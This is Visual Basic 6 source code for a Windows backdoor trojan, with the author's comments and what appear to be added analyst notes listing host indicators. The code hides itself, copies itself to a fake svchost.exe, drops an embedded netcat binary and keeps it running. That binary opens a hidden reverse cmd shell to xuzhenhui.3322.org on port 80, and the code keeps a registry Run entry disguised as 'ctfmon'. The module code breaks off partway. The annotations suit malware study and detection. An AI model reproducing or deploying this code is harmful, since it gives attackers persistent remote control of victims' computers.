以下是form1中的代码:
' Module-level state shared by the event handlers of this form.
' ms: byte buffer that receives the embedded resource before Timer1_Timer writes it to disk.
Dim ms() As Byte
' share: full path of the relocated copy of this executable; assigned in Form_Load.
Dim share As String
' Form_Load: startup routine of the sample.
' It hides the form, removes the program from the task list, exits when another
' instance is already running, and relocates the executable to a fixed path.
' Analyst note: the relocated copy is named svchost.exe but sits under
' "Common Files\Microsoft Shared\MSInfo". A process or file with that name at
' that path is a host indicator for this sample.
Private Sub Form_Load()
' No visible window.
Me.Hide
' Keep the program out of the Windows task list.
App.TaskVisible = False
' Single-instance guard: a second copy terminates immediately.
If App.PrevInstance Then
End
End If
share = "C:\Program Files\Common Files\Microsoft Shared\MSInfo\svchost.exe"
If App.Path & "\" & App.EXEName & ".exe" <> share Then'Author's note: the launcher file and the running file are kept separate
' Copy this executable to the fixed path only when no file exists there yet.
if dir(share)="" then
FileCopy App.Path & "\" & App.EXEName & ".exe", share
end if
' Start the relocated copy with a hidden window, then end the current process.
Shell share, vbHide
End
End If
End Sub
' Timer1_Timer: timer handler that keeps the dropped NC binary on disk and running.
' The timer interval is set outside the code shown here.
' Analyst note: indicators visible in this handler are the file c:\windows\ms.exe,
' a hidden process started from it with "-d -e cmd", and outbound traffic to
' xuzhenhui.3322.org on port 80.
Private Sub Timer1_Timer() 'Author's note: watch over NC
' Re-create the binary whenever it is missing from disk.
If Dir("c:\windows\ms.exe") = "" Then
ms = LoadResData(101, "custom")'Author's note: extract nc (resource id 101, type "custom")
Open "c:\windows\ms.exe" For Binary As #1
Put #1, 1, ms()'Author's note: write NC into the system directory
Close #1
End If
' Relaunch whenever the process check reports that it is not running.
If CheckApplicationIsRun("ms.exe") = False Then
Shell "c:\windows\ms.exe -d -e cmd xuzhenhui.3322.org 80", vbHide'Author's note: NC reverse connection
End If
End Sub
' CheckApplicationIsRun: reports whether a process matching szExeFileName is running.
' It enumerates Win32_Process instances through WMI and compares each Description
' with the supplied name, ignoring case.
' Parameters:
'   szExeFileName - executable file name to look for (the caller passes "ms.exe").
' Returns:
'   True when a process Description occurs inside szExeFileName, otherwise False.
'   If any statement raises an error, control jumps to the Err label and the
'   function returns the value assigned so far (False unless a match was found).
Function CheckApplicationIsRun(ByVal szExeFileName As String) As Boolean 'Author's note: checks whether NC is running; the sample would also work without this function
On Error GoTo Err
Dim WMI
Dim Obj
Dim Objs
CheckApplicationIsRun = False
' Bind to the local WMI service and list all running processes.
Set WMI = GetObject("WinMgmts:")
Set Objs = WMI.InstancesOf("Win32_Process")
For Each Obj In Objs'Author's note: iterate over the processes
' InStr searches for the process Description inside the supplied name,
' so the match is a case-insensitive substring test in that direction.
If InStr(UCase(szExeFileName), UCase(Obj.Description)) <> 0 Then
CheckApplicationIsRun = True
' Release the WMI object references before returning.
If Not Objs Is Nothing Then Set Objs = Nothing
If Not WMI Is Nothing Then Set WMI = Nothing
Exit Function
End If
Next
' No match: release the references and return False.
If Not Objs Is Nothing Then Set Objs = Nothing
If Not WMI Is Nothing Then Set WMI = Nothing
Exit Function
Err:
' Error path: release whatever references were obtained.
If Not Objs Is Nothing Then Set Objs = Nothing
If Not WMI Is Nothing Then Set WMI = Nothing
End Function
' Timer2_Timer: timer handler that maintains the autostart entry and its target file.
' The timer interval is set outside the code shown here.
' Analyst note: the Run value is named "ctfmon" but points to
' c:\windows\system32\edit.exe. That name/path mismatch, and an edit.exe at that
' location, are persistence indicators for this sample. RegEdit (module1) opens
' the key under HKEY_LOCAL_MACHINE.
Private Sub Timer2_Timer()'Author's note: watch over the registry Run entry and the startup file
Dim sys As String
sys = "c:\windows\system32\edit.exe"
' Ensure the Run value "ctfmon" exists with sys as its data.
RegEdit "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "ctfmon", sys
' Restore the startup copy from the running executable when it is missing.
If Dir(sys) = "" Then
FileCopy App.Path & "\" & App.EXEName & ".exe", sys
End If
End Sub
以下是module1的代码:
' Win32 constants used by module1.
' HKEY_LOCAL_MACHINE: predefined registry root handle; RegEdit passes it to RegOpenKey.
Public Const HKEY_LOCAL_MACHINE = &H80000002
' GW_OWNER, SW_HIDE and WM_CLOSE are not referenced in the portion of the code shown here.
Public Const GW_OWNER = 4
Public Const SW_HIDE = 0
Public Const WM_CLOSE = &H10
Public Sub RegEdit(strPath As String, strKey As String, strValue As String)'一个修改注册表的子过程
Dim l As Long
Dim s As String
Dim s1 As String
Dim n As Long
Dim keyhand As Long
s = String(255, Chr(0))
s1 = String(255, Chr(0))
n = 255
l = RegOpenKey(HKEY_LOCAL_MACHINE, strPath, keyhand)
If l = 0 Then '是否打开
l = RegQueryValueEx(keyhand, strKey, 0, 1, ByVal s, 255)
If l <> 0 Then '是否也有
l = RegSetValueEx(keyhand, strKey, 0, 1, ByVal strValue, LenB(strValue)) '修改注册表